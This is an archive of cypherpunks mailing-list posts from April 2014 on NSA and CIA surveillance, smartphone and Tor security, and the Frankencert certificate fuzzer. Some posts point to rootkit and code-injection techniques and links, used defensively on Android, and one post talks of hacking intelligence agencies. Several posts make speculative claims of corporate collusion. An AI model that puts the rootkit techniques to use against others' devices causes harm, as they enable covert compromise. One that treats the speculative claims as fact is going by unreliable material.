-------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From coderman at gmail.com Sat Apr 5 20:03:25 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 20:03:25 -0700 Subject: Investigating the Investigators In-Reply-To: <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com> References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> <2599717.Sq0aVNU7Id@lap> <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: On Thu, Apr 3, 2014 at 8:53 AM, jim bell wrote: > ... About all I can say at the moment is that I am very busy, have > a lot to do.. we still need to meet up for blunts, booze, and key exchange Jim... the future; it's calling! ;) From coderman at gmail.com Sat Apr 5 20:07:00 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 20:07:00 -0700 Subject: RAND study on "Markets for Cybercrime Tools and Stolen Data" In-Reply-To: <533EAC25.8050406@entersection.org> References: <533EAC25.8050406@entersection.org> Message-ID: On Fri, Apr 4, 2014 at 5:57 AM, Gregory Foster wrote: > ... RAND National Security Research Division (2014) - "Markets for > Cybercrime Tools and Stolen Data: Hackers' Bazaar" by Lillian Ablon, > Martin C. Libicki, Andrea A. Golay: > http://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf "The harmful effects of black markets on cybersecurity suggest the need for options to suppress such market activity--without which, very little is likely to change." the intelligence community thanks you for your pervasive inaction and futile efforts to restrain their black market production pipeline! From grarpamp at gmail.com Sat Apr 5 17:13:34 2014 From: grarpamp at gmail.com (grarpamp) Date: Sat, 5 Apr 2014 20:13:34 -0400 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: <20140405180708.GB23433@torproject.org> References: <533C96AF.2050004@anonymous.coward.posteo.de> <533D79FC.3070703@freitas.net> <533F48CF.6070606@anonymous.coward.posteo.de> <20140405180708.GB23433@torproject.org> Message-ID: >> For example, I want to talk to political activists, I would like to >> discuss with them, no matter if I share their views or not. This could >> easily make you interesting for certain people. Sometimes just talking >> to certain people could make you suspicious. > > If you are concerned with protecting the social graph of who you are > communicating with, there is *maybe* exactly one communication system > that exists today that can protect this information from a dedicated > adversary with resources on the order of a drug cartel. Excepting that we're in anti-graph tor-talk forum... Why are people so sure to give primary fear to letting our graph be known? Where are the people screaming that content is the worse leak? Maybe you know a lot of Muslim terrist sympathizers, but are really calling to see about dinner plans, maybe you sell pens to all sorts of specialist doctors, and document services to criminal defense attorneys, condoms to whores, and pagers to drug dealers, wearcams to activists, etc. Contact graphs can usually be dual use and rarely used directly against you. Content is usually single use and is often used against you. A link to another secure phone voice/msg app, redphone/textsecure... https://whispersystems.org/‎ Now if we can just have an android phone app/ROM do encrypted voice (by somehow hooking into the mic/speaker codec/pcm/modem path) over the cell voice network (voice minutes plan, usable everywhere) instead of: - the wifi-ip network (free, if you are near an AP, which you usually aren't) - the cell data-ip network (requires a data/ip plan) then I can see a huge number of people installing that app/ROM. I don't know of anyone working on this though :( [The pricing of [un]limited cell minutes/data/sms vs. your usage of same is in some regions more attractive/available without a data plan. Thus making this voice app/ROM more universally useful.] [You still have to trust the integrated baseband processor, till that hardware gets opened up.] From coderman at gmail.com Sat Apr 5 20:25:47 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 20:25:47 -0700 Subject: [cryptography] Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: On Thu, Apr 3, 2014 at 5:09 AM, John Young wrote: > The CIA is the principal customer of NSA products outside > the military... > > CIA (long FBI opponents) thought FBI could not cope with inside > terrorists, using 9/11 as an example, and advocated NSA involvement > with its much greater technical capability, but more importantly, its > military-privileged secrecy not susceptible to full congressional > oversight, courts and FOIA. > > The joint CIA-NSA Special Collection Service (SCS) has > been doing for decades what NSA is now alone accused of doing: > CIA provided the targets, NSA did the technical collection from > those global stations identified by xKeyscore (most in embassies > or nearby). > > What is bizarre is how little CIA is mentioned in news furor about > NSA, as if NSA did its work in isolation from the IC and without > oversight of the 3 branches. FBI DITU also playing front-man as of late, it seems. FBI-DITU + NSA-SSO/TAO + CIA/NSA-SCS - this is a trifecta of fuckery! they're a legislative laundry designed to circumvent any constraints individually by collectively attaining ends via means so offensive they must remain hidden lest "National Security and The Future of our Nation" be at risk... were i a new age "Citizens for Intelligence Community Oversight" i would pwn all three, and dump the entirety of their operations to darknet. let the public sort it out... [exercise for the reader: would it take longer for the world to digest an entire dump than it would the current Snowden-subset processing via reporter privilege?] > SCS also does burglaries, code snatches, decrypts, doc drops, > stings, ploys, blackmail, the panoply of CIA operations. The increased > civilian target panoply bestowed upon NSA came from CIA demands > channeled through ODNI. > > Reviewing what little has been released of the Snowden documents > they are quite similar to what SCS has been doing with the addition > of the US as target. FISA had to be rejiggered for the US domain. the use of foreign, military IC tools against domestic targets is where many interesting stories lay. you think yesterday's battlefield exploits don't become today's domestic lawful access? epic lulz! what fucking tatters they've left our "Constitutional Rights"... [which should be afforded to all citizens of Eath, my over seas peers fucked harder, longer, in no offensive a manner] > NSA's recent attempt to slough off Cybercom and return to > its military mission, has been rejected by the civilian overseers > following CIA guidance and fear-mongering of civilians, especially > those inside the US. The last thing CIA and its supporters want > is a revelation of its manipulation of civilian leaders institutionalized > by the 1947 National Security Act (also opposed by the military). indeed. IC suffering a deluge of undue oversight and sunlight. are you crazy POTUS, you want more potential visibility? get tha fuck back in yer hole, servant... From jamesdbell9 at yahoo.com Sat Apr 5 20:28:24 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 5 Apr 2014 20:28:24 -0700 (PDT) Subject: Investigating the Investigators In-Reply-To: References: <1396407729.9479.YahooMailNeo@web126201.mail.ne1.yahoo.com> <1396413531.19418.101719853.46243D2B@webmail.messagingengine.com> <1396415798.46921.YahooMailNeo@web126201.mail.ne1.yahoo.com> <2599717.Sq0aVNU7Id@lap> <1396540386.93508.YahooMailNeo@web126205.mail.ne1.yahoo.com> Message-ID: <1396754904.7088.YahooMailNeo@web126203.mail.ne1.yahoo.com> Let's put it a few months into the future so that everybody can schedule.  Mid-July, perhaps?      Jim Bell ________________________________ From: coderman To: jim bell Cc: rysiek ; "cypherpunks at cpunks.org" Sent: Saturday, April 5, 2014 8:03 PM Subject: Re: Investigating the Investigators On Thu, Apr 3, 2014 at 8:53 AM, jim bell wrote: > ... About all I can say at the moment is that I am very busy, have > a lot to do.. we still need to meet up for blunts, booze, and key exchange Jim... the future; it's calling! ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1973 bytes Desc: not available URL: From coderman at gmail.com Sat Apr 5 20:30:53 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 20:30:53 -0700 Subject: Anarchism and Capitalism [was: reminder of mays manifesto] Message-ID: On Sat, Apr 5, 2014 at 5:02 AM, Cari Machet wrote: > i post this here as a reminder of anarchist models and how they can be > utilized in fascist occasions and are anti facsist but also are anti > capitalist anarchistic theories as anti-capitalist? the best markets are fully decentralized, with pervasive information: anarchistic to their core! the fact that nearly all systems of capitalist claim in current day are absurd perversion of an ideal does not imply the concept itself is invalid... best regards, From coderman at gmail.com Sat Apr 5 20:52:52 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 20:52:52 -0700 Subject: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] Message-ID: the entire "Legislative Laundry of FBI+CIA+NSA+DIA Collusion" and their enablers need to die in a fire. sole focus on NSA a smoke screen... On Wed, Apr 2, 2014 at 7:56 PM, wrote: >... > From the outset, I approached my responsibilities as a member > of the Review Group with great skepticism about the NSA. I am > a long-time civil libertarian, a member of the National Advisory > Council of the ACLU, and a former Chair of the Board of the > American Constitution Society. To say I was skeptical about > the NSA is, in truth, an understatement. > > I came away from my work on the Review Group with a view of > the NSA that I found quite surprising. Not only did I find > that the NSA had helped to thwart numerous terrorist plots > against the United States and its allies in the years since > 9/11, but I also found that it is an organization that operates > with a high degree of integrity and a deep commitment to the > rule of law. my greatest fears are not about what the NSA has intended, but what the NSA has built with the best intentions, which in turn will fall into malicious hands. history tells us this is but a matter of time. as an attacker, i see the capabilities so developed as nothing short of abhorrent. they should not exist, they should not be pursued. they are means that are unethical no matter the end. > ... The Review Group found that many of > the programs undertaken by the NSA were highly problematic and > much in need of reform. But the responsibility for directing > the NSA to carry out those programs rests not with the NSA, > but with the Executive Branch, the Congress, and the Foreign > Intelligence Surveillance Court, which authorized those programs see also, the "Legislative Laundry of FBI+CIA+NSA+DIA Collusion" to focus on NSA is to miss the underlying patterns of control at work... > It gradually became apparent to me that in the months after > Edward Snowden began releasing information about the government's > foreign intelligence surveillance activities, the NSA was being > severely -- and unfairly -- demonized by its critics. conflating NSA as an institutional entity, NSA tasking, and NSA staff. NSA tasking is bad and should feel bad. NSA institutional culture is less bad, yet needs correction. NSA employees individually? they have been deceived and demoralized themselves! this group is the least culpable, in my eyes. i have friends in IC and i can tell you they feel no less sucker punched by these revelations. make no mistake, they've been similarly mislead by "legal weasel words" and "exceptionally compartmentalized deceptions", etc. there are heads at the top that need severing from bodies. [wait, they've admitted that is too kind. life support in keep-away for centuries!!!!] > Of course, "I was only following orders" is not always an > excuse. But in no instance was the NSA implementing a program > that was so clearly illegal or unconstitutional that it would > have been justified in refusing to perform the functions > assigned to it by Congress, the President, and the Judiciary. see also "compartmentalization". i have a story to tell here about physical encryption systems in surveillance satellites. you think NSA staff even knew what they were working on? that's the exception, rather than the rule. your "big data science to optimize in memory representation of sparse lattices" is just an innocuous cog in a machine cracking weak crypto to target drones to metadata targets that resulted in the loss of innocent life in some third world backwater you've never given thought to. [and tomorrow's domestic oppression of opportunity unleashed through the best intentions. if only we knew back then... if only...] > Although the Review Group found that many of those programs > need serious re-examination and reform, none of them was so > clearly unlawful that it would have been appropriate for the > NSA to refuse to fulfill its responsibilities. you think that's an accident? this is precision engineering! see also, the "Legislative Laundry of FBI+CIA+NSA+DIA Collusion" > Moreover, to the NSA's credit, it was always willing to engage > the Review Group in serious and candid discussions about the > merits of its programs, their deficiencies, and the ways in > which those programs could be improved. Unlike some other > entities in the intelligence community and in Congress, the > leaders of the NSA were not reflexively defensive, but were > forthright, engaged, and open to often sharp questions about > the nature and implementation of its programs. this means they're the least useful to question. when does CIA/DIA scrutiny begin? > In short, I found, to my surprise, that the NSA deserves the > respect and appreciation of the American people. But it should > never, ever, be trusted. NSA used like a tool, just like the sysadmin and cryptographer "tools" they exploited and used so effectively... From coderman at gmail.com Sat Apr 5 21:30:25 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 21:30:25 -0700 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: <533D33AD.3040509@sent.at> References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> Message-ID: On Thu, Apr 3, 2014 at 3:10 AM, wrote: > ... > That made me wonder. What are the risks involved using a Tails PC and > getting online through a 3G clean Android smartphone with no apps > installed or Google accounts activated tethered through USB? as long as you assume the 3G link is as trustworthy as your neighborhood open wifi, you're fine. i can tell you that i've had malware sent down a 3G pipe to a tethered target just as you might except on any other hostile network. incidentally, this tethered mode is how i prefer to communicate: 1. a front-end sacrificial/signalling device to indicate a threat level and carry traffic. (hotspot puck, 3G phone, CPE router, etc.) 2. a packet inspecting host to passively monitor for anomalies and respond to emergencies. (emergency zeroisation+filtering) 3. the actual communicating device containing keys and terminating sessions. further hardened by defense in depth. for any decent attacker, mobile platforms are just fucked. sorry! this is true until you can implement an entire isolated SDR stack; even opaque wifi blobs are fail. [i've stated my preference for various software defined radio setups before, omitted.] > Or better yet: who can see what? > > I read the hardware is rigged (Samsungs), you wrote about the software > being rigged (the ability to remotely install apps), and surely the > phone company can do a lot of tricks from the early days of GSM. So is > it crazy to route Tor traffic through such a gateway? it's fine to route traffic over such a device as long as you assume the attacker is also watching and able to inject into your traffic over said gateway :) this means you run Tor on a different device, not the phone itself. last but not least, regarding the "Mission Impossible: Hardening Android for Security and Privacy" https://blog.torproject.org/blog/mission-impossible-hardening-android-security-and-privacy i have found the following techniques useful in the past against advanced attackers: 0.) rootkit Android kernel to trap and notify|block syscall use by user-id and process-id. anomalous calls by a privileged processes or users is a great signal of compromise. 1.) monkey patch Android API in every dalvik runtime for specific calls of interests that should not be granted. this caught the "Android Master key" vuln in practice as an updated app was behaving way out of permission and expected profile. 2.) deploy camouflage guacamole to feign vulnerability to various techniques and then use exploit attempts to signal presence of an adversary of identified capabilities. doing the above on a reference Nexus 7 platform left as exercise for the reader, *grin* best regards, From coderman at gmail.com Sat Apr 5 22:05:47 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 22:05:47 -0700 Subject: DILKE-ALLEN Award Message-ID: what is the history? From coderman at gmail.com Sat Apr 5 23:33:54 2014 From: coderman at gmail.com (coderman) Date: Sat, 5 Apr 2014 23:33:54 -0700 Subject: [tor-talk] Linux kernel transproxy packet leak (w/ repro case + workaround) In-Reply-To: <533C4FFE.2050702@openmailbox.org> References: <20140328194312.GD31390@torproject.org> <533AC785.9010005@openmailbox.org> <533C4FFE.2050702@openmailbox.org> Message-ID: On Wed, Apr 2, 2014 at 10:59 AM, Rusty Bird wrote: > ... > Maybe it can be boiled down to this: When redirecting *and* filtering, > the filtering should be done in OUTPUT (instead of INPUT), ... this is where defense in depth at the multiple-virtual machine / routing layer fails safe in ways that a single / monolithic Tor setup cannot, when applied with care. what i mean by "applied with care" is that forwarding through Tor only is the default. Anything unexpected / unsupported gets the bit bucket. the best target is actually TARPIT, not DROP, but that's another discussion... [this advice to default drop and isolate at routing level applies to Tails, Whonix, Qubes TorVM, and whoever else allows a transparent proxy model, IMHO] best regards, From coderman at gmail.com Sun Apr 6 01:48:29 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 01:48:29 -0700 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> Message-ID: On Sun, Apr 6, 2014 at 1:26 AM, grarpamp wrote: > ... > SDR... fun gear for btc miners to spend their coin on.... the old GPUs that used to pool mine before the ASIC takeover are great for searching key spaces and permutated dictionaries, but seems the SDR adoption is lacking. traditionally, SDR is narrowband focused, low overhead more than amenable to CPU cycles. very wide band, very high rate, multi-radio SDR setups are just now coming into independent exploration; perhaps then old GPUs can be brought back to utility! *grin* > Related reading, > a Nexus 5 service manual search string: 173744848-LG-D821.pdf my favorite odd band technical input is still the barcode scanners from decades past which would interpret scanned input and escapes same as keyboard console entry. factory reset SMS type attacks have been ongoing for so many years, the same mistakes over and over. back then, you could claim innocent times. today, there is just no excuse. last but not least, regarding compromising your own devices to know when someone might be trying to compromise your devices, the following may be useful hints in the proper direction. as always, best to build your own :) https://github.com/hiteshd/Android-Rootkit search: LD_PRELOAD hooking http://www.cydiasubstrate.com/inject/android/ / http://www.cydiasubstrate.com/inject/dalvik/ your mileage may vary... best regards, From coderman at gmail.com Sun Apr 6 03:04:57 2014 From: coderman at gmail.com (coderman) Date: Sun, 6 Apr 2014 03:04:57 -0700 Subject: Frankencert - Adversarial Testing of Certificate Validation in SSL/TLS Implementations Message-ID: https://github.com/sumanj/frankencert Frankencert - Adversarial Testing of Certificate Validation in SSL/TLS Implementations What are frankencerts? Frankencerts are specially crafted SSL certificates for testing certificate validation code in SSL/TLS implementations. The technique is described in detail in the 2014 IEEE Symposium on Security and Privacy (Oakland) paper - Using Frankencerts for Automated Adversarial Testing of Certificate Validation in SSL/TLS Implementations by Chad Brubaker, Suman Jana, Baishakhi Ray, Sarfraz Khurshid, and Vitaly Shmatikov. Why is frankencert generator useful? Frankencert generator is essentially a smart fuzzer for testing SSL/TLS certificate validation code. If you are a developer who is implementing any sort of SSL/TLS certificate validation code (either as part of an SSL/TLS library or an application), you can use the frankencert generator to auto-generate different test certificates involving complex corner cases. We have successfully used frankencerts to find serious vulnerabilities in GnuTLS, PolarSSL, CyaSSL, and MatrixSSL as described in our Oakland 2014 paper. We also found several discrepancies between how different SSL/TLS implementations report errors back to the user. For example, when presented with an expired, self-signed certificate, NSS, Chrome on Linux, and Safari report that the certificate has expired but not that the issuer is invalid. How do frankencerts work? The basic idea of frankencerts is to take a bunch of certificates as seeds and use random mutations on different fields and extensions to create new test certificates (frankencerts). Using frankencerts as server-side inputs into an SSL/TLS handshake can help systematically test correctness of the certificate validation code. Installation and Usage Install OpenSSL libraries and utilities if you don't have them already. The frankencert generator needs a modified version of PyOpenSSL. We have included the source for our modified version of PyOpenSSL. You will need to install it in order to use the frankencert generator. First, uninstall any other version of PyOpenSSL that you may have installed on your computer. Go to the pyOpenSSL-0.13 directory and build/install PyOpenSSL by issuing sudo python setup.py install. Once you have the patched pyOpenSSL set up, to generate frankencerts, use the franken_generate.py script: python franken_generate.py seed_certs_dir ca_cert output_dir count [config_file]. The arguments are explained below. seed_certs_dir: Frankencert generator needs a set of seed certificates. Any SSL cert in PEM fromat can act as a seed cert. seed_certs_dir can be any directory containing the seed certs stored as PEM files. You can either use tools like ZMap (https://zmap.io/) to collect SSL seed certificates, or use some of the SSL certs available from https://www.eff.org/observatory. Please note that these are not our tools and repositories - you may want to contact their respective developers and maintainers to ensure that your usage of the certificates they collected is compatible with the intended purpose. You do not need access to the corresponding private keys to use the certs as seeds. For your convenience, we have included a tarball containing around 1000 seed certificates in utils/sample_seed_certs.tar.gz. ca_cert: You will also need to create a self-signed CA certificate to sign the frankencerts. You can either use the included sample CA certificate utils/rootCA_key_cert.pem or use the utils/create_new_ca.sh script to create your own root CA. For any root CA that you use for frankencert generation, make sure that your SSL certificate validation code treats its certificate as a trusted root certificate. VERY IMPORTANT: this root certificate should be trusted ONLY during testing. If you accidentally or intentionally deploy SSL/TLS with this certificate still among the trusted root certificates, your SSL/TLS connections may be vulnerable to server impersonation and man-in-the-middle attacks. Be sure to REMOVE this certificate from your trusted root certificates once the testing is finished. output_dir: It will contain the generated frankencerts. The frankencerts will be named as frankencert-.pem. count: Number of frankencerts to be generated. config_file: An optional argument to tune the frankencert generation process. Take a look at the utils/sample_franken.conf for a sample config file. To test your SSL/TLS client with the generated frankencerts, you should use the utils/test_ssl_server.py script to set up an SSL server that can present the generated frankencerts as part of the SSL handshake. Project structure The frankengen directory contains the frankencert generator code Our patched version of pyOpenSSL is inside pyOpenSSL-0.13 directory Several useful tools are included in utils cert_print.py: a tool for printing frankencerts. It requires OpenSSL to be installed and present in the path. rootCA_key_cert.pem: private key and self-signed cert of a sample CA that can be used for signing frankencerts. create_new_ca.sh: a script for creating new CA with a self-signed cert. It creates the output cert and private key in rootCA.pem (requires OpenSSL). test_ssl_server.py: a sample SSL/TLS server for presenting frankencerts to SSL/TLS clients sample_seed_certs.tar.gz: Some sample certs that may be used as seeds for frankencert generation. sample_franken.conf: A sample config file that can be used to tune different parameters of the frankencert generation process. From grarpamp at gmail.com Sun Apr 6 01:26:19 2014 From: grarpamp at gmail.com (grarpamp) Date: Sun, 6 Apr 2014 04:26:19 -0400 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> Message-ID: > for any decent attacker, mobile platforms are just fucked. sorry! > this is true until you can implement an entire isolated SDR stack; > even opaque wifi blobs are fail. SDR... fun gear for btc miners to spend their coin on. Related reading, a Nexus 5 service manual search string: 173744848-LG-D821.pdf From me at staticsafe.ca Sun Apr 6 08:35:50 2014 From: me at staticsafe.ca (staticsafe) Date: Sun, 06 Apr 2014 11:35:50 -0400 Subject: [cryptography] Github Pages now supports SSL In-Reply-To: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> Message-ID: <53417456.2060405@staticsafe.ca> On 4/6/2014 10:40, tpb-crypto at laposte.net wrote: >> Message du 04/04/14 20:09 >> De : "Eric Mill" >> Along with Cloudflare's 2014 plan to offer SSL termination for free, and >> their stated plan to double SSL on the Internet by end of year, the barrier >> to HTTPS everywhere is dropping rapidly. >> > > I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service. Source for this please? -- staticsafe From gwen at cypherpunks.to Sun Apr 6 13:51:54 2014 From: gwen at cypherpunks.to (gwen hastings) Date: Sun, 06 Apr 2014 13:51:54 -0700 Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of covert compromise and corruption [was: Geoff Stone, Obama's Review Group] In-Reply-To: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> References: <6885D313C801F146232AFB56@F74D39FA044AA309EAEA14B9> Message-ID: <5341BE6A.6060105@cypherpunks.to> FUCK THE NSA!! asshat motherfuckers! warmly gwen On 4/6/14 1:31 PM, Juan Garofalo wrote: > > > --On Saturday, April 05, 2014 8:52 PM -0700 coderman > wrote: > > >> >>> It gradually became apparent to me that in the months after >>> Edward Snowden began releasing information about the government's >>> foreign intelligence surveillance activities, the NSA was being >>> severely -- and unfairly -- demonized by its critics. >> >> conflating NSA as an institutional entity, NSA tasking, and NSA staff. >> >> NSA tasking is bad and should feel bad. >> >> NSA institutional culture is less bad, yet needs correction. >> >> NSA employees individually? they have been deceived and demoralized >> themselves! this group is the least culpable, in my eyes. > > > Are you joking? The 'NSA institutional entity' IS NOTHING BUT THE > COLLECTION OF NSA EMPLOYEES. > > Ah, yes, this team of murderers is bad 'as a team', but when you look at > each individual murderer, individually they are > anarcho-libertarian-pacifists who live in a monastery in tibet. > > Please. > > > -- Tentacle #99 ecc public key curve p25519(pcp 0.15) 1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910 Governments are instituted among men, deriving their just powers from the consent of the governed, that whenever any form of government becomes destructive of these ends, it is the right of the people to alter or abolish it, and to institute new government, laying its foundation on such principles, and organizing its powers in such form, as to them shall seem most likely to effect their safety and happiness.’ https://github.com/TLINDEN/pcp.git to get pcp(curve25519 cli) https://github.com/stef/pbp.git (curve 25519 python based cli) -------------- next part -------------- A non-text attachment was scrubbed... Name: 0x42AA24D5.asc Type: application/pgp-keys Size: 70878 bytes Desc: not available URL: From ryacko at gmail.com Sun Apr 6 14:28:51 2014 From: ryacko at gmail.com (Ryan Carboni) Date: Sun, 6 Apr 2014 14:28:51 -0700 Subject: [cryptography] Github Pages now supports SSL In-Reply-To: <450704774.433340.1396812055146.JavaMail.www@wwinf8222> References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> <450704774.433340.1396812055146.JavaMail.www@wwinf8222> Message-ID: oh dear. He helped the government combat crime and nuisance style offenses. Clearly in collusion. On Sun, Apr 6, 2014 at 12:20 PM, wrote: > > Message du 06/04/14 17:41 > > De : "staticsafe" > > On 4/6/2014 10:40, tpb-crypto at laposte.net wrote: > > >> Message du 04/04/14 20:09 > > >> De : "Eric Mill" > > >> Along with Cloudflare's 2014 plan to offer SSL termination for free, > and > > >> their stated plan to double SSL on the Internet by end of year, the > barrier > > >> to HTTPS everywhere is dropping rapidly. > > >> > > > > > > I agree that putting https everywhere is great, but Cloudflare's > founders are tightly linked with the US-intelligence community. That fact > alone kind of kills any claims they make about data security within their > service. > > > > Source for this please? > > > > Is it so painful to do your own homework? > > "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in > 2009.[1][2] They previously worked on Project Honey Pot." - > http://en.wikipedia.org/wiki/CloudFlare > > "[...] the project organizers also help various law enforcement agencies > combat private and commercial unsolicited bulk mailing offenses and overall > work to help reduce the amount of spam being sent [...]" - > http://en.wikipedia.org/wiki/Project_Honey_Pot > > That's just for starters, you can dig more and find more. It is > interesting that the history of the founders themselves is no longer > exhibited in cloudflare.com website as it was years ago. > > > As an American company, there is nothing preventing Cloudflare from > receiving NSLs and having to shut up about them. What use is a system that > you can't trust like this? > > You can say "oh, but they go after the bad guys, spammers". But that > doesn't limit it to spammers neither do we know who are the so called bad > guys, since that is decided by American secret laws, made by secret courts, > that issue secret orders. > > No trust to American companies, less even trust to American companies that > promise any kind of data security. Better no security than a false sense of > it. > > Sorry. > _______________________________________________ > cryptography mailing list > cryptography at randombit.net > http://lists.randombit.net/mailman/listinfo/cryptography > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3262 bytes Desc: not available URL: From grarpamp at gmail.com Sun Apr 6 12:14:03 2014 From: grarpamp at gmail.com (grarpamp) Date: Sun, 6 Apr 2014 15:14:03 -0400 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> Message-ID: > the old GPUs that used to pool mine before the ASIC takeover are great > for searching key spaces and permutated dictionaries, but seems the > SDR adoption is lacking. traditionally, SDR is narrowband focused, > low overhead more than amenable to CPU cycles. very wide band, very > high rate, multi-radio SDR setups are just now coming into independent > exploration; perhaps then old GPUs can be brought back to utility! Agreed near-unlimited-width SDR has fun potential, and for cpunks some equally hard to identify/jam/locate encrypted comms that don't interfere with traditional narrow comms. There are some cheap ex-mining FPGA rigs being dumped on the market too now that they're worthless to the majority of their point-and-click owners. > my favorite odd band technical input is still the barcode scanners > from decades past which would interpret scanned input and escapes same http://americanhistory.si.edu/collections/search/object/nmah_892778 https://en.wikipedia.org/wiki/Helium-neon_laser My later unit of this same class of tech still reads UPC's, love the sounds it makes. > as keyboard console entry. factory reset SMS type attacks have been > ongoing for so many years, the same mistakes over and over. back > then, you could claim innocent times. today, there is just no excuse. No doubt in part because we forget wisdom of history in favor of new hotness. Will be pretty sad when in 2100 we have to literally rediscover things from scratch because they're lost. ie: "How the fuck did they do that and their hacking tricks." http://thecorememory.com/ From adi at hexapodia.org Sun Apr 6 15:14:49 2014 From: adi at hexapodia.org (Andy Isaacson) Date: Sun, 6 Apr 2014 15:14:49 -0700 Subject: [tor-talk] How safe is smartphones today? In-Reply-To: References: <533C96AF.2050004@anonymous.coward.posteo.de> <20140403013535.GA9002@torproject.org> <533D33AD.3040509@sent.at> Message-ID: <20140406221449.GT18407@hexapodia.org> On Sat, Apr 05, 2014 at 09:30:25PM -0700, coderman wrote: > for any decent attacker, mobile platforms are just fucked. sorry! > this is true until you can implement an entire isolated SDR stack; > even opaque wifi blobs are fail. > [i've stated my preference for various software defined radio setups > before, omitted.] Agreed that free-software SDR is better in the long run, but there are blob-free WiFi cards available: https://www.fsf.org/resources/hw/endorsement/thinkpenguin (they even let you pay with bitcoin.) -andy From scott at sbce.org Sun Apr 6 13:42:52 2014 From: scott at sbce.org (Scott Blaydes) Date: Sun, 6 Apr 2014 15:42:52 -0500 Subject: [cryptography] Github Pages now supports SSL In-Reply-To: <450704774.433340.1396812055146.JavaMail.www@wwinf8222> References: <2032043828.224611.1396795238185.JavaMail.www@wwinf8228> <53417456.2060405@staticsafe.ca> <450704774.433340.1396812055146.JavaMail.www@wwinf8222> Message-ID: On Apr 6, 2014, at 2:20 PM, tpb-crypto at laposte.net wrote: >> Message du 06/04/14 17:41 >> De : "staticsafe" >> On 4/6/2014 10:40, tpb-crypto at laposte.net wrote: >>>> Message du 04/04/14 20:09 >>>> De : "Eric Mill" >>>> Along with Cloudflare's 2014 plan to offer SSL termination for free, and >>>> their stated plan to double SSL on the Internet by end of year, the barrier >>>> to HTTPS everywhere is dropping rapidly. >>>> >>> >>> I agree that putting https everywhere is great, but Cloudflare's founders are tightly linked with the US-intelligence community. That fact alone kind of kills any claims they make about data security within their service. >> >> Source for this please? >> > > Is it so painful to do your own homework? > > "Matthew Prince, Lee Holloway, and Michelle Zatlyn created CloudFlare in 2009.[1][2] They previously worked on Project Honey Pot." - http://en.wikipedia.org/wiki/CloudFlare > > "[...] the project organizers also help various law enforcement agencies combat private and commercial unsolicited bulk mailing offenses and overall work to help reduce the amount of spam being sent [...]" - http://en.wikipedia.org/wiki/Project_Honey_Pot > > That's just for starters, you can dig more and find more. It is interesting that the history of the founders themselves is no longer exhibited in cloudflare.com website as it was years ago. > > > As an American company, there is nothing preventing Cloudflare from receiving NSLs and having to shut up about them. What use is a system that you can't trust like this? > > You can say "oh, but they go after the bad guys, spammers". But that doesn't limit it to spammers neither do we know who are the so called bad guys, since that is decided by American secret laws, made by secret courts, that issue secret orders. > > No trust to American companies, less even trust to American companies that promise any kind of data security. Better no security than a false sense of it. > > Sorry. I have noticed CloudFlare CAPTCHA screens before I can access some sites via Tor. This begs the question of how much data is CloudFlare gathering from Tor exit nodes and who are they selling it to? Due to links with the US Intelligence community and possibly receiving NSLs, they are in a great position to provide information about what people use Tor for. Perhaps thwarting spammers is a great cover for keeping track of traffic to and from alleged terrorist IPs/Net blocks. Since they also help mitigate DDoS attacks, they can also keep track of alleged Anonymous pwned hosts used for originating DDoS campaigns. They are a great “in the trenches” company that can be very versatile for keeping track of the Bad Guys(tm). Thank you, Scott -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 842 bytes Desc: Message signed with OpenPGP using GPGMail URL: From shelley at misanthropia.info Sun Apr 6 16:32:46 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Sun, 06 Apr 2014 16:32:46 -0700 Subject: FUCK THE FUCKING NSA AND THE APOLOGISTS FOR SAME FUCK YOU!!!Re: fuck ALL obscene systems of 